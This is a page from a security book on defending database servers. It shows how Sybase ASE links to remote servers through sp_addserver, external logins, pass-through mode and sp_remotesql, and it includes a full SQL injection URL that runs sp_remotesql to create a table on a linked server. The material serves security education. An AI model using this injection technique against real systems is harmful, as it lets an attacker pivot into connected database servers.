Connecting to Other Servers with Sybase

Previous page
Table of content
Next page

The legitimate method using sp_addserver is probably the easiest to use. To set up a connection to a remote Sybase ASE server with a specified username and password, execute the following: 

 sp_addserver 'TEST', null, '192.168.1.12:5000'

The server TEST has now been set up with the physical address being the IPv4 address 192.168.1.12, TCP port 5000.

You can then specify credentials for the remote server, specifying which local account maps to which credential set on the remote host: 

 sp_addexternlogin 'TEST', 'sa', 'sa', 'password'

Assuming you are logged in as sa to the local Sybase server, you can now test the connection to the remote host. If you have a direct connection to the local server, you can simply execute the statement 

 connect to TEST

to enter pass-through mode, which forwards all queries to TEST. You should be able to select @@version to determine the version of the remote host. To exit pass-through mode, type disconnect .

If you do not have a reliable direct connection to the local server (for example, you are working via SQL injection) you can make use of the sp_remotesql stored procedure to execute SQL on the newly added server: 

 sp_remotesql 'TEST', 'select 123'

You can use this syntax to create procedures and tables on the remote server.

In SQL injection terms, the web request to make a call to sp_remotesql would look like this: 

 http://sybase.example.com/servlet/BookQuery?search=')+exec+sp_remotesql+'TEST','create+table+doodah(a+int)'--

Other ways of connecting to remote servers include adding a reference to a remote table or procedure that you know exists, for example the master..sysservers table: 

 create existing table foo( srvid smallint, srvstatus smallint, srvname varchar(30), srvnetname varchar(32),       srvclass smallint NULL, srvsecmech varchar(30) NULL, srvcost smallint NULL )        external table at "TEST.master..sysservers"

You can then select from this table as though it were on the local server.

You can connect to other DBMS by changing the second parameter to sp_addserver: 

 sp_addserver 'TEST', 'sql_server'

Previous page
Table of content
Next page
Database Hacker's Handbook. Defending Database Servers
The Database Hackers Handbook: Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156
Authors: David Litchfield, Chris Anley, John Heasman, Bill Grindlay
BUY ON AMAZON
Inside Network Security Assessment: Guarding Your IT Infrastructure
Identifying and Managing Project Risk: Essential Tools for Failure-Proofing Your Project
GO! with Microsoft Office 2003 Brief (2nd Edition)
Special Edition Using Crystal Reports 10
Lean Six Sigma for Service : How to Use Lean Speed and Six Sigma Quality to Improve Services and Transactions
FileMaker 8 Functions and Scripts Desk Reference
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy